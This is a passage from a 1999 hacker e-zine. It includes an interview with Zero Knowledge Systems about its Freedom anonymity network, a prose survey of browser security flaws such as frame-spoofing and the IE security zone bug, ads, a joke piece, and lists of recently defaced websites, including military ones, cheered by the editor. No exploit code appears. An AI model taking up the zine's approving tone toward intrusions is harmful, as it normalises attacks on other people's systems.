asking your operating system vendor sometime what steps they're taking to protect you from attack by hostile software. If the answer you get is that they're helping to prosecute David Smith, don't buy it. Today there are hundreds of David Smiths worldwide, and a new David Smith is born every day. There's only one Microsoft. Can't they do any better than to point the finger? @HWA 49.0 World of freedom: An interview with Zero Knowledge Systems, by BHZ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ WORLD OF FREEDOM IS COMING by BHZ, Friday 7th May 1999 on 3:23 pm CET Privacy. The word which is often in the news. Is Big Brother watching? Well if he is, then he is finished. New program, called Freedom will change it all. It will base on new Freedom network (world's ISPs join forces on this matter). Read here on HNS, exclusive interview with Jordan Socran from Zero-Knowledge Systems, company behind Freedom. See how will you be able to surf, chat and use e-mail 100% anonymously. So read the interview in our Special Report. Special Report; http://www.net-security.org/spec/zks/index.htm If you may know, because many news sites wrote about Freedom, this new program will secure us in the future. What is Freedom? How will it work? Why the company has been "attacked" by Intel? Find the answers in exclusive interview with Jordan Socran, manager of partnership programs for ZKS. With Freedom to 21st century <BHZ> ZKS is a famous company now, when was it founded and with what plans? <ZKS> ZKS is founded in 1997 to provide Net users with a way to protect their privacy online. Plans are to offer users the ability to set up and manage multiple digital identities that they can use online. This way they can enjoy all the benefits of the Net without sacrificing their privacy. We wanted to let people enjoy the privacy they have in the physical world on the Internet. Freedom is the way they can. <BHZ> Freedom is first project created by ZKS? <ZKS> Yes. We are scheduled to release the beta later this month and Freedom 1.0 later this summer. Freedom is the only thing we are working on since ZKS was started. In the future, we plan on releasing Freedom for kids, to protect children online as well as a version of Freedom that can be used on an Intranet, i.e. behind a firewall. This current version is for personal use only. <BHZ> On what basis Freedom works? <ZKS> We invented a technology we are calling PIP - Privacy Enhanced Internet Protocol. We looked at all the current remailing technologies, etc, including onion-routing, Penet.fi and many others. We have figured out a way to go beyond these systems to maximize the efficiency of anonymous re-routing and strong crypto. Freedom removes identifying information, encrypts data packets multiple times and routes them through a series of Freedom Servers, hosted by ISP's around the world. <BHZ> You made big marketing for Freedom, many sites have Freedom buttons for several months... <ZKS> We have actually done very little marketing. We have not spent any money promoting Freedom. We have received a lot of press due to the nature of our product and people all over the world have communicated with one another without ZKS intervention. <ZKS> The sites of people with buttons - these people have found us :) <BHZ> But you have affiliates, which can earn money if visitors from their site buy a copy of freedom? <ZKS> Yes. we now have over 1000 ! :) The difference is that these people believe in the cause, not just the money. We want to give the power back to the people, that is why we say that Freedom empowers . We want to make a change. <ZKS> We are NOT just out to make $$ <BHZ> Well to people privacy is very important. On your opinion, will Freedom become the best and most famous of all security solutions? <ZKS> Maybe, maybe not - the people will decide. We will release Freedom for the people that need it most. The people in Human Right organizations, people in countries where the gov't doesn't let them enjoy the Internet, people who wish to be private on the Net. We hope other companies will begin to offer solutions as well that help the people do this. Will Freedom be the most secure? We will see. It is a dangerous thing to offer partial security... <BHZ> On what operating systems will Freedom run? <ZKS> This version is for Windows only. We will be looking at other platforms as soon as we release to port the client to - i.e. Linux, Mac, etc. We hope to one day go open source... Freedom network <BHZ> So when someone buys Freedom, how is the program reacting to hide the real identity of the customer? <ZKS> We use a double-blind registration process. the download is free. You can download Freedom as many times as you wish - at home, at work, etc. You then go online to buy tokens. Each token can be redeemed to activate one pseudonym (nym) on the Freedom Network for a 12 month period. The token is just a serial number. We have created a pool of millions of tokens. When you buy a token, you pull it out of the token pool. We do not know which token you received. Our server checks to see if it is a valid token but we don't know who received the token. <BHZ> So client with installed Freedom program connects to Freedom network. It is all crypted... So how fast is it then? <ZKS> We have overcome many of the slowdowns that using strong crypto would bring. Users in North America will not notice a slowdown. In Europe, it will depend on where you are and how many ISP's are running Freedom Servers in your area. Where the Internet backbone is strong, Freedom will be faster. <BHZ> So how many ISPs are connected into Freedom network? <ZKS> Right now 50 ISP's on 4 continents - Australia, Austria, Canada, Japan, Netherlands, UK and the United States <BHZ> And what are the plans, to enlarge your network? <ZKS> We are promoting the Freedom Server program by advertising to ISP's, online, at conferences, etc. Many ISP's have heard about it and are contacting us. Since we announced the Freedom Network, we have received _many requests from ISP's around the world (many in Europe) about joining the network. It will grow as people hear about and begin using - Freedom <BHZ> How big is the team behind Freedom? <ZKS> We are 35 people here at Zero-Knowledge, including Ian Goldberg (Ian cracked the 40 bit DES code in the RSA Data Security challenge in 3.5 hours. He also cracked the GSM Cellular phone standard and the Netscape SSL). k <BHZ> Very impressive... He is very useful in Freedom project <ZKS> Yes, he is helping a lot with security. He is one of the "WiReD 25" the 25 people Wired Magazine listed as most likely to influence the future of the Internet. Pentium Serial Number (PSN) exploit <BHZ> So as you work on privacy, you found a way to read PSN (Pentium Serial Numbers) from computer with Pentium III chip? <ZKS> Yes. We realized that the software fix Intel issued to turn off the identifier, was easily compromised <BHZ> And you released public script that exploits that "turn off" function on PIII running computers? <ZKS> No. The script is not public. We posted a demonstration on our site that shows you that the identifier is not secured by the Intel patch, plus we digitally signed the demonstration so that people would know it was just ZKS demonstrating. <BHZ> It uses active X controls? <ZKS> It was written in ActiveX, yes. <BHZ> How were reactions from the public? <ZKS> We got tremendous support from the public for exposing the flaw. <BHZ> Ok so public reacted in positive way, but you had some problems with Intel? <ZKS> Yes, Intel asked Symantec to label the demonstration as a malicious virus, and they did. This brought even more support and led to the current controversy. <BHZ> Were you contacted by Intel directly? <ZKS> We had originally contacted them to tell them about the problem with the chip and ways to resolve them. We hoped that Intel would act to address these very serious privacy concerns... <BHZ> And then they "attacked" your exploit saying that it is malicious... <ZKS> Yes. <BHZ> So what is the current situation between ZKS and Intel? <ZKS> We are still trying to discuss this with Intel and we hope they will be responsive... but as of now, they don't seem ready to address the issue <BHZ> Well public is on your side, even hackers are on your side... Just to note that www.freedom.edu was hacked earlier today stating "sad but true, freedom is an illusion" and they told their opinions on Intel-ZKS situation. <ZKS> Is it? ;) The Freedom we're releasing will not be an illusion. We are thankful to have the hacker community on our side, helping us to evaluate the software and offering their suggestions in increasing its security, if need be. <BHZ> How much will Freedom cost? <ZKS> Freedom is free (the software). You have to buy tokens. We are selling them for $50 USD for a package of 5 tokens. Each one can be used to activate 1 nym on the Freedom Network for 1 year (12 months). ZKS website - http://www.zks.net BHZ bhz@net-security.org http://net-security.org @HWA 50.0 Trojan B'Gone ~~~~~~~~~~~~~ From http://www.net-security.org/ TROJAN B' GONE by BHZ, Thursday 6th May 1999 on 11:45 am CET Dark Eclipse Software, programming groups that released BackDoor trojan and AIM recover, published info about new trojan scanner. New features will be: Scan for trojans in different ways for effectiveness and speed, scan ports to see if trojans are on them, view programs loading with windows or running in the memory, monitor ports for people trying to use trojans and you could create your own trojan plugins with our plugin creator. Visit Trojan B' Gone section at link below http://216.71.96.168/des/software/tbg/index.html @HWA 51.0 The New Generation of Browsers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NEW GENERATION BROWSERS by BHZ, Thursday 6th May 1999 on 11:55 am CET Our new special report, written by Thejian, is called New Generation Browsers: Are they worth the fuzz? So you could guess, he speaks about different aspects of new-wave browsers and lists the common bugs in them. Read the Special Report below; The New Generation Browsers: Are they worth the fuzz? The general public is becoming more and more security- and, even more so, privacy-concious. Finally the realization that there's no real legitimate reason for things as the MS GUID (global unique identifier, a "feature" of the Microsoft Office package wich lets the apps MS Word and MS Excel add an id-tag to every created document wich makes it possible to trace this back to its original creator). Because of this it's not that awkward to hear the major browser-developers make claims about their browsers capabillities in this field. But are these claims justified? Previous versions of the Netscape and Opera browsers contained some serious flaws, not to mention the huge breach of security Microsofts Internet Explorer was. The purpose of this document is to explore various major flaws in the "new generation browsers" to provide the general public with the means to make a good comparison. Naturally the manufacturers of these new browsers will do everything to assure the public they got it right this time, this document will try to figure out how close to the truth these claims really are. The problems: 1. Frame-spoofing The frame-spoofing exploit allows Web sites to insert its own frames into a third-party site in the window of a surfer who visits both sites. The risk here is that an unsuspecting user who might be submitting credit card or private information to a trusted site unknowingly leaks this info to a third party. Since the discovery of this hole several variations (like the "window-spoofing" instead of "frame-spoofing" exploit). This bug has plagued all the major browsers. The problem is that these browsers allow the manipulation of frames across domains. This hole was announced patched by restricting the writing of frames to a single domain. Opera went even as far as to restrict this to pages originating from the same server. 2. "Caching" This bug allows the webmaster of a malicious site to view the contents of a users cache by utilization of Javascript. In a twist on this, it has also been proven possible by Juan Carlos Cuartango to read the contents of an users clipboard among other things. Since most users are relying heavily on "cut/paste"-functions this of course should also be considered a major security-/privacy-hole. This one also was announced patched. But.. But guess what? The new Microsoft Internet Explorer 5 still allows the frame-spoofing and reading of local files as described by G. Guninski (http://www.whitehats.com/guninski/read.html) on the Bugtraq mailinglist. And yes, Netscapes new baby is still vulnerable too. Another bug, known as the security zone bug, in IE 4 and 5 (by connecting to http://3475932041 the browsers surfs to the MS Web site, because Winsock translates the URL as an existing IP. Problem here is that the browser figures the site is within the "trusted local intranetzone" and because of this automatically submits usernames and passwords without asking for confirmation by the user) is partially fixed but this one can also still in some way or another be exploited. Opera did a pretty decent job at plugging the spoofing-hole, but that company recently discovered it still is possible to make a browser try and open up a fake frame, but in the process using the wrong adress. Patches for this problem are expected to keep the browser from opening the frame at all, but hey, there hasn't really been lived up to those expectations recently has there? The new versions of these browsers even have some nice new "features": - Microsofts Internet Explorer 5 now contains a so-called Auto-Complete function. When users begin typing in a URL, IE will suggest possible matches from sites they have recently visited. This can save a user from having to type out long URLs. It can also help people find sites they visited but did not bookmark. Problem is though, that this feature also applies to online forms. Because of this data like username/password combinations are remembered by the browser. Nice feature when you're on a shared computer eh? Advised is to turn the Auto-Complete function off. - Another nice feature of the Internet Explorer 5 is that is notifies Web sites when they get bookmarked by the user. This was an intended feature, it's supposed to help webdesigners "brand" a users bookmarks. This feature enables in short a Web site to put a logo up next to the corresponding bookmark (called "Favorites" in Internet Explorer). The browser requests a file called favicon.ico to put the image in that file next to the bookmark. While developing this function Microsoft obviously didn't think (or just plainly ignored) the privacy of their users. A site could hypothetically use the feature to build a log of a user's bookmarked pages. Visitors could be tracked anonymously, by a cookie, or by name, if they registered at the site. - Netscape has thought of something nice too. Netscape's (4.5) what's related function connects to the rl.ld1.netscape.com site at random. For every 5 sites you visit 1 connection is made to their server. This is probably to keep some stats or something, but I actually enjoy having some privacy so you might want to turn "what's related" off too. As you've probably gathered from the above, the main problem with the "new generation browsers" (as was with their predecessors) lies within the implementation of scripting languages. This got illustrated this week by the alert that the so-called "anonymizing"- services like Anonimyzer, Onion Router, Lucent Personalized Web Assistant and AIX Privacy (wich are supposed to provide their users with stealth browsing without showing any information about the users to the visited Web sites) allow sites to simply turn the anonymizing-function off by using a Javascript redirect-tag. As was noted in response to this alert, this is not a fault by the involved online services, but more one on the users side. If your privacy is truly dear to you, the best thing to do probably is turning off the Javascript, Java and AxtiveX functions in your browser. It seems that browser- manufacturers are just not ready for the use of those functions yet. It might get a tad less colourful and sparkling on the Net, but hey, privacy isn't that bad either eh? Anyone tried Lynx? Overflow-patch now availble.. Thejian for Help Net Security http://net-security.org @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** <img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a> !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 <a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a> !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre <a href="http://www.2600.com/">www.2600.com</a> <a href="http://www.kevinmitnick.com></a> * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * <a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* BSOD Simulator May 4, 1999 Users of Red Hat 6.0 are discovering a new feature that hasn't been widely advertised: a Blue Screen of Death simulator. By default, the bsodsim program activates when the user hits the virtually unused SysRq key (this is customizable), causing the system to switch to a character cell console to display a ficticious Blue Screen. Red Hat hails the bsodsim program as the "boss key" for the Linux world. "Many old DOS games had a boss key, which caused the program to switch to a DOS shell or a benign looking screenshot when the boss walked by," a Red Hat engineer explained. "This allowed unscrupulous workers to play games without the knowledge of the PHB. With multitasking, this isn't necessary anymore." He continued, "However, a new 'boss problem' has emerged. Workers are smuggling Linux boxes into companies that exclusively use Windows. This is all good and well until the PHB walks by and comments, 'That doesn't look like Windows...' With bsodsim, that problem is solved. The worker can hit the emergency SysRq key, and the system will behave just like Windows..." The bsodsim program doesn't stop at just showing a simulated error message. If the boss doesn't walk away, the worker can continue the illusion by hitting CTRL-ALT-DEL, which causes a simulated reboot. After showing the usual boot messages, bsodsim will run a simulated SCANDISK program indefinitely. The boss won't be able to tell the difference. If the boss continues to hang around, the worker can say, "SCANDISK is really taking a long time... maybe we should upgrade our computers. And don't you have something better to do than watch this computer reboot for the tenth time today?" Red Hat 6.0 also includes a 'Flying Windows' screensaver for use with X Windows. If the boss happens to walk by your computer when you're away, he still won't be able to tell that it's not running Windows. --- James S. Baughn http://i-want-a-website.com/about-linux/ @HWA SITE.1 interScape.403-security.org Croatian phreaking group ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Should be online as of this release, interScape is a new phreak group that has found a home on the 403-security server. AirWalk of interScape promises an ezine with h/p articles and general security concerns along with other releases that are to appear on the website is the Phreak Bible (in Croatian) version 2.0, an impressive looking piece of work over 4M in size, expect to hear a lot from this group in coming months. The phreak bible is also available on xoom (in croatian, there is no english version planned or in the works at this time) at the following url; http://members.xoom.com/interScape/phreak01.zip @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Astral reports that DT (Dutch Threat) cracked the following sites over the weekend Anti NATO Serbian sites got hacked Astral 02.04.1999 22:18 Today 6 Yugoslavian anti NATO sites were hacked by dutchthreat with message : "www.dutchthreat.org condemns all activities againts human rights.Pro NATO, peace." Following sites were hacked : May 2nd www.pentagon.co.yu www.italsrem.co.yu www.martinart.co.yu www.carbo.co.yu www.net022.co.yu/crazy/nato.htm www.net022.co.yu/nato/index.html May 3rd Cracked www.bellsouth.com (D-Elite Crew) www.ibm-teamplayers.com (cold fusion, not Domino? :-) www.elektra.com (cold fusion) www.conted.bcc.ctc.edu (cold fusion) asi.bigsky.net www.emmsa.com (cold fusion) eforms.sjdccd.cc.ca.us www.energy.wsu.edu (cold fusion) May 4th From HNN rumours section http://www.hackernews.com/ contributed by Anonymous Cracked People still have not fixed their Cold Fusion holes. There are a smattering of .mil sites today as well. Wonder how many commanders learn about thier security breaches from HNN? http://www.pentagon.co.yu http://www.italsrem.co.yu http://www.martinart.co.yu http://www.carbo.co.yu http://www.net022.co.yu http://force21.c3sys.army.mil http://www.ett.redstone.army.mil http://bliss-usasma.army.mil http://call.army.mil http://www.wwd.net http://www.wrestlemaniacs.com http://www.centrestate.com http://www.herb.be http://www.pwr1.com http://www.shenandoah.com http://www.suite101.com http://www.galaxy-web.com http://www.1688.com http://jacwm.nac.net http://www.rotorcraft.com http://www.ulead.com.tw http://www.glynn.com http://www.gecc.com http://www.zol.ch http://www.news400.com May 6th From HNN rumours section; contributed by Anonymous Cracked Many of these government sites where reported as cracked by the group known as Foxpare. http://comms2.rdc.uscg.mil http://c4iweb.nosc.mil/ http://bigblue.od.nih.gov http://www.freedom.edu http://www.mrihsv.com http://www.queen.it http://eo1.gsfc.nasa.gov http://comms2.rdc.uscg.mil ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html <a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a> Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html <a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a> New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ <a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a> Mirror sites: ~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ <a href="http://bewoner.dma.be/cum/">Go there</a> Brasil........: http://www.psynet.net/ka0z <a href="http://www.psynet.net/ka0z/">Go there</a> http://www.elementais.cjb.net <a href="http://www.elementais.cjb.net/">Go there</a> Columbia......: http://www.cascabel.8m.com <a href="http://www.cascabel.8m.com/">Go there</a> http://www.intrusos.cjb.net <a href="http://www.intrusos.cjb.net">Go there</a> Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a> http://members.xoom.com/neblonica/ <a href="http://members.xoom.com/neblonica/">Go there</a> http://hackerlink.or.id/ <a href="http://hackerlink.or.id/">Go there</a> Netherlands...: http://security.pine.nl/ <a href="http://security.pine.nl/">Go there</a> Russia........: http://www.tsu.ru/~eugene/ <a href="http://www.tsu.ru/~eugene/">Go there</a> Singapore.....: http://www.icepoint.com <a href="http://www.icepoint.com">Go there</a> Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- � 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]